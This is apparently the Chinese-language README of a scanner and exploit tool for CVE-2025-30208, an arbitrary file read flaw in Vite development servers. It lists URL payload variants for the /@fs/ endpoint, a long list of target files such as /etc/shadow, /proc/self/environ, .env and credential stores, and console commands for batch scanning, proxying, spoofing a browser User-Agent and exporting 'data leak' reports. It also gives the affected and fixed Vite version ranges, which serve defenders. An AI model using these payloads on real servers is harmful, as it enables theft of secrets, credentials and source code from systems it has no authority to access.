这是一个综合性漏洞扫描器,旨在检测和利用 Vite 开发服务器中的 CVE-2025-30208 漏洞。该漏洞允许攻击者通过 Vite 的文件系统端点实现任意文件读取,从而可能暴露敏感配置文件、源代码和系统信息。
该工具现在采用模块化架构,以提升可维护性和可扩展性:
CVE-2025-30208.py - 主扫描器应用程序payloads.py - 高级利用载荷(60+ 种变体)sensitive_files.py - 综合性敏感文件数据库(200+ 个文件)html_template.py - 增强的黑客风格 HTML 报告模板pip3 install -r requirements.txt
python3 CVE-2025-30208.py
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd
CVE-2025-30208 > test
CVE-2025-30208 > run
# 启用详细模式以获取更详细的输出
CVE-2025-30208 > verbose
CVE-2025-30208 > run
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch
192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[按两次回车结束]
CVE-2025-30208 > scan
# 配置代理
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
# 设置自定义请求头
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}
# 配置速率限制
CVE-2025-30208 > rate
Enter rate limit: 1.0
# 生成美观的 HTML 报告
CVE-2025-30208 > pull
# 启动 Web 服务器查看报告
CVE-2025-30208 > web
# 在指定端口启动 Web 服务器
CVE-2025-30208 > web 8081
# 停止 Web 服务器
CVE-2025-30208 > web off
扫描器现在使用 60+ 种不同的载荷变体,组织在 payloads.py 中:
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8
/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug
/@fs/{file_path}?raw&esm
/@fs/{file_path}?raw&cjs
/@fs/{file_path}?raw&umd
/@fs/{file_path}?raw&js
/@fs/{file_path}?raw&ts
/@fs/{file_path}?raw&json
/@fs/{file_path}?raw&css
/@fs/{file_path}?raw&html
/app/{file_path}?raw??
/App/{file_path}?raw??
该工具现在测试 200+ 个敏感文件,组织在 sensitive_files.py 中:
/etc/passwd - 用户账户信息/etc/shadow - 加密密码数据/etc/services - 网络服务/etc/hosts - 主机名映射/etc/fstab - 文件系统表/etc/ssh/sshd_config - SSH 服务器配置/etc/crontab - 系统计划任务/etc/sudoers - Sudo 配置/proc/version - 内核版本/proc/cpuinfo - CPU 信息/proc/meminfo - 内存信息/proc/self/environ - 进程环境变量/proc/self/cmdline - 进程命令行/proc/net/tcp - TCP 连接/proc/net/udp - UDP 连接.env - 环境变量.env.local - 本地环境.env.production - 生产环境config.json - 应用程序配置settings.json - 应用程序设置application.properties - Spring 配置application.yml - YAML 配置database.yml - 数据库配置secrets.json - 密钥管理package.json - Node.js 依赖项package-lock.json - 锁定依赖项yarn.lock - Yarn 锁定文件vite.config.js - Vite 配置vite.config.ts - TypeScript Vite 配置tsconfig.json - TypeScript 配置webpack.config.js - Webpack 配置next.config.js - Next.js 配置nuxt.config.js - Nuxt.js 配置angular.json - Angular 配置vue.config.js - Vue.js 配置rollup.config.js - Rollup 配置eslint.config.js - ESLint 配置.git/config - Git 配置.gitignore - Git 忽略规则.gitattributes - Git 属性.gitmodules - Git 子模块.git/HEAD - 当前分支.git/logs/HEAD - Git 日志.git/refs/heads/master - master 分支.git/refs/heads/main - main 分支README.md - 项目文档CHANGELOG.md - 变更日志LICENSE - 许可证信息CONTRIBUTING.md - 贡献指南AUTHORS - 作者信息TODO.md - 待办事项列表ROADMAP.md - 开发路线图Dockerfile - Docker 配置docker-compose.yml - Docker Composedocker-compose.override.yml - 覆盖配置.dockerignore - Docker 忽略规则docker-compose.prod.yml - 生产配置docker-compose.dev.yml - 开发配置nginx.conf - Nginx 配置apache2.conf - Apache 配置httpd.conf - HTTP 守护程序配置.htaccess - Apache 访问控制web.config - IIS 配置robots.txt - 搜索引擎指令sitemap.xml - 网站结构manifest.json - Web 应用清单sw.js - Service Workerfirebase.json - Firebase 配置firebase.rules - Firebase 安全规则boot.ini - 启动配置autoexec.bat - 自动执行脚本system.ini - 系统配置win.ini - Windows 配置Users - 用户目录Windows - 系统文件Program Files - 应用程序目录System - 系统文件Library - 库文件Applications - 应用程序文件private/etc/hosts - Hosts 文件private/etc/passwd - 用户账户database.db - SQLite 数据库database.sqlite - SQLite 数据库data.db - 数据数据库dump.sql - 数据库转储schema.sql - 数据库模式migrations - 数据库迁移logs - 日志目录error.log - 错误日志access.log - 访问日志app.log - 应用程序日志debug.log - 调试日志combined.log - 合并日志backup - 备份目录backup.sql - 数据库备份backup.zip - 压缩备份dump - 数据转储export - 数据导出auth.json - 认证配置credentials.json - 凭据存储keys.json - 密钥管理tokens.json - 令牌存储jwt.json - JWT 配置oauth.json - OAuth 配置api.json - API 配置swagger.json - API 文档openapi.json - OpenAPI 规范graphql.json - GraphQL 配置schema.json - API 模式cloudformation.yml - AWS CloudFormationserverless.yml - Serverless 配置terraform.tf - Terraform 配置kubernetes.yml - Kubernetes 配置k8s.yml - Kubernetes 配置analytics.json - 分析配置monitoring.json - 监控设置metrics.json - 度量配置telemetry.json - 遥测数据该工具现在生成美观的黑客风格 HTML 报告,包含:
6.2.0 ≤ Vite ≤ 6.2.2
6.1.0 ≤ Vite ≤ 6.1.1
6.0.0 ≤ Vite ≤ 6.0.11
5.0.0 ≤ Vite ≤ 5.4.14
Vite ≤ 4.5.9
Vite ≥ 6.2.3
6.1.2 ≤ Vite < 6.2.0
6.0.12 ≤ Vite < 6.1.0
5.4.15 ≤ Vite < 6.0.0
4.5.10 ≤ Vite < 5.0.0
CVE-2025-30208 > set THREADS 20
CVE-2025-30208 > set RATE_LIMIT 0.5
CVE-2025-30208 > set TIMEOUT 10
CVE-2025-30208 > verbose
CVE-2025-30208 > batch
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
CVE-2025-30208 > set RATE_LIMIT 2.0
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > pull
CVE-2025-30208 > web 8080
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > scan
CVE-2025-30208/
├── CVE-2025-30208.py # 主扫描器应用程序
├── payloads.py # 高级利用载荷(60+)
├── sensitive_files.py # 敏感文件数据库(200+)
├── html_template.py # 增强的 HTML 报告模板
├── README.md # 本文档
├── requirements.txt # Python 依赖项
├── logs/ # 日志文件目录
├── data_leak.html # 生成的 HTML 报告
├── data_leak.json # 生成的 JSON 报告
└── session.json # 保存的会话配置
我们欢迎贡献以改进此工具:
payloads.py 中添加新的载荷变体sensitive_files.py 中添加额外的敏感文件模式html_template.py 中增强 HTML 模板本项目仅用于教育和授权安全测试目的。
⚠️ 法律免责声明: 此工具仅适用于授权安全测试和研究目的。用户有责任确保在测试任何系统之前已获得适当授权。作者不对任何滥用此工具的行为负责。
⭐ 如果此工具对你有帮助,请给它一个星标!⭐
为安全社区倾心打造 ❤️
| 命令 | 描述 | 示例 |
|---|
set <option> <value> | 设置配置选项 | set RHOST 192.168.1.100 |
show options | 显示当前设置 | show options |
edit | 交互式选项编辑器 | edit |
run / exploit | 运行漏洞测试 | run |
batch | 批量扫描多个目标 | batch |
scan | 发现敏感文件 | scan |
pull | 导出结果到 HTML/JSON | pull |
web [on|off|port] | HTML 报告 Web 服务器 | web 8080 |
save | 保存会话配置 | save |
load | 加载会话配置 | load |
test | 测试与目标的连通性 | test |
validate | 验证当前配置 | validate |
verbose | 切换详细模式 | verbose |
proxy | 配置代理设置 | proxy |
headers | 设置自定义 HTTP 请求头 | headers |
rate | 配置速率限制 | rate |
log | 显示日志信息 | log |
help / ? | 显示帮助 | help |
exit / quit | 退出工具 | exit |
| 选项 | 描述 | 默认值 | 验证规则 |
|---|
RHOST | 目标主机/IP 地址 | - | 主机名/IP 验证 |
RPORT | 目标端口号 | - | 端口范围 (1-65535) |
FILEPATH | 要测试的文件路径 | etc/passwd | 路径验证 |
PROXY | HTTP/HTTPS 代理 URL | - | URL 格式验证 |
VERBOSE | 启用详细输出 | false | 布尔值验证 |
RATE_LIMIT | 请求之间的延迟(秒) | 0.3 | 数字验证 |
THREADS | 批量扫描的线程数 | 5 | 整数验证 |
TIMEOUT | 请求超时(秒) | 5 | 整数验证 |
CUSTOM_HEADERS | 自定义 HTTP 请求头(JSON) | {} | JSON 格式验证 |
prettier.config.js - Prettier 配置jest.config.js - Jest 配置babel.config.js - Babel 配置tailwind.config.js - Tailwind CSS 配置| 文件 | 描述 | 格式 |
|---|
data_leak.html | 增强的黑客风格 HTML 漏洞报告 | HTML |
data_leak.json | 结构化的 JSON 导出 | JSON |
sensitive_files_discovery.json | 发现的敏感文件 | JSON |
session.json | 保存的会话配置 | JSON |
logs/cve_2025_30208_YYYYMMDD_HHMMSS.log | 详细审计日志 | 文本 |